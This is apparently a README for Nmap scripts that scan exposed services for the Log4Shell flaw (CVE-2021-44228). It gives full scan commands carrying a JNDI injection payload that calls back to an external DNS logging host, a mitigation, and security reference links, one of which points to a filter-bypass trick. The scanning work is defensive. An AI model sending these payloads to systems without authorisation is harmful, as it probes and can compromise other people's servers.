Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload.

Note that NSE scripts will only issue the requests to the services. Nmap will not report vulnerable hosts, but you have to check DNS logs to determine vulnerability. Also note that DNS resolution with prefixes combination in a expression for log4j-core <= 2.7 seems not supported. So, testing with something like ${java:os} could lead to false negatives. Therefore, better to have few false positives than negatives.

Go to http://github.com/kost/logdns and get DNS server. Get domain and point to the somewhere where you have installed logdns:

nmap --script=http-log4shell,ssh-log4shell,imap-log4shell  '--script-args=log4shell.payload="${jndi:ldap://{{target}}.xxxx.logdns.xxx}"' -T4 -n -p0-65535 --script-timeout=1m MY.IPs.TO.SCAN

Go to http://dnslog.cn/ and Get SubDomain. Replace your xxxx with your SubDomain:

nmap --script=http-log4shell,ssh-log4shell,imap-log4shell  '--script-args=log4shell.payload="${jndi:ldap://{{target}}.xxxx.dnslog.cn}"' -T4 -n -p0-65535 --script-timeout=1m MY.IPs.TO.SCAN

Take your domain from Burp collaborator and replace xxxx with your domain:

nmap --script=http-log4shell,ssh-log4shell,imap-log4shell  '--script-args=log4shell.payload="${jndi:ldap://{{target}}.xxxx.burpcollaborator.net/diverto}"' -T4 -n -p0-65535 --script-timeout=1m MY.IPs.TO.SCAN

List of best fixes and workarounds.

Best solution to protect from CVE-2021-44228: Start your server with log4j2.formatMsgNoLookups set to true, or update to log4j-2.15.0-rc1 or later.

General references and links to the vulnerability

Reddit thread - General information about log4shell

NCC log4shell - operational information regarding the vulnerability (IOCs, mitigation, scanning, software)

BlueTeam CheatSheet Log4Shell - Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)

Software List - cheat-sheet reference guide - Affected software list by vendor responses

lo4shell.huntress.com - Online Log4Shell Vulnerability Tester

log4j yara - yara rules for local detection

identify-log4j-class-location.sh - Script to identify Log4J affected class for CVE-2021-44228 in a collection of ear/war/jar files

PoC-log4j-bypass-words - A trick to bypass words blocking patches

log4shell-detector - Detector for Log4Shell exploitation attempts

Log4Shell-IOCs - a list of IOC feeds and threat reports

log4j_rce_detection.md - You can use these commands and rules to search for exploitation attempts

log4j advisory - Apache Log4j Security Vulnerabilities

log4j pull request and comments - pull request that fixes bug with comments

Logout4Shell - Quick and dirty alternative to patching manually